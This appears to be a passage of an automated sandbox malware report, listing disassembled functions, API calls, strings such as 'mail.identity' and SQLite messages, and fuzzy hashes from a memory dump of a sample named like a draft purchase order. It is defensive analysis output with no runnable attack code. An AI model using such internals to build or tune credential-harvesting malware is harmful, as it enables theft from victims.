                                                                                • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp
                                                                                • String ID:
                                                                                • API String ID: 3384217055-0
                                                                                • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                APIs
                                                                                  • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004048C2
                                                                                • memset.MSVCRT ref: 004048D6
                                                                                • memset.MSVCRT ref: 004048EA
                                                                                • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID:
                                                                                • API String ID: 368790112-0
                                                                                • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040D2C2
                                                                                • memset.MSVCRT ref: 0040D2D8
                                                                                • memset.MSVCRT ref: 0040D2EA
                                                                                • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                • memset.MSVCRT ref: 0040D319
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID:
                                                                                • API String ID: 368790112-0
                                                                                • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 00425850
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                • __allrem.LIBCMT ref: 00425933
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                APIs
                                                                                Strings
                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                • too many SQL variables, xrefs: 0042C6FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                • API String ID: 2221118986-515162456
                                                                                • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                APIs
                                                                                • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: $, $CREATE TABLE
                                                                                • API String ID: 3510742995-3459038510
                                                                                • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                APIs
                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                • memset.MSVCRT ref: 004026AD
                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                  • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                • String ID:
                                                                                • API String ID: 3503910906-0
                                                                                • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C922
                                                                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                • String ID:
                                                                                • API String ID: 3798638045-0
                                                                                • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                APIs
                                                                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                • strlen.MSVCRT ref: 0040B60B
                                                                                • atoi.MSVCRT(?,00000000,?,75920A60,?,00000000), ref: 0040B619
                                                                                • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                • String ID:
                                                                                • API String ID: 4107816708-0
                                                                                • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                • _gmtime64.MSVCRT ref: 00411437
                                                                                • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                • strftime.MSVCRT ref: 00411476
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                • String ID:
                                                                                • API String ID: 1886415126-0
                                                                                • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: strlen
                                                                                • String ID: >$>$>
                                                                                • API String ID: 39653677-3911187716
                                                                                • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: @
                                                                                • API String ID: 3510742995-2766056989
                                                                                • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi
                                                                                • String ID: C@$mail.identity
                                                                                • API String ID: 1439213657-721921413
                                                                                • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                APIs
                                                                                • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                • String ID:
                                                                                • API String ID: 1479990042-0
                                                                                • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00406640
                                                                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset$memcmp
                                                                                • String ID: Ul@
                                                                                • API String ID: 270934217-715280498
                                                                                • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                APIs
                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75920A60), ref: 00408EBE
                                                                                • sprintf.MSVCRT ref: 0040B929
                                                                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408E31
                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                • sprintf.MSVCRT ref: 0040B953
                                                                                • _mbscat.MSVCRT ref: 0040B966
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 203655857-0
                                                                                • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040ADE8
                                                                                • memset.MSVCRT ref: 0040ADFE
                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                • sprintf.MSVCRT ref: 0040AE28
                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75920A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75920A60), ref: 00406D4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                • String ID: </%s>
                                                                                • API String ID: 3699762281-259020660
                                                                                • Opcode ID: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                                                                • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                • Opcode Fuzzy Hash: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                                                                • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                APIs
                                                                                  • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                Strings
                                                                                • recovered %d pages from %s, xrefs: 004188B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                • String ID: recovered %d pages from %s
                                                                                • API String ID: 985450955-1623757624
                                                                                • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
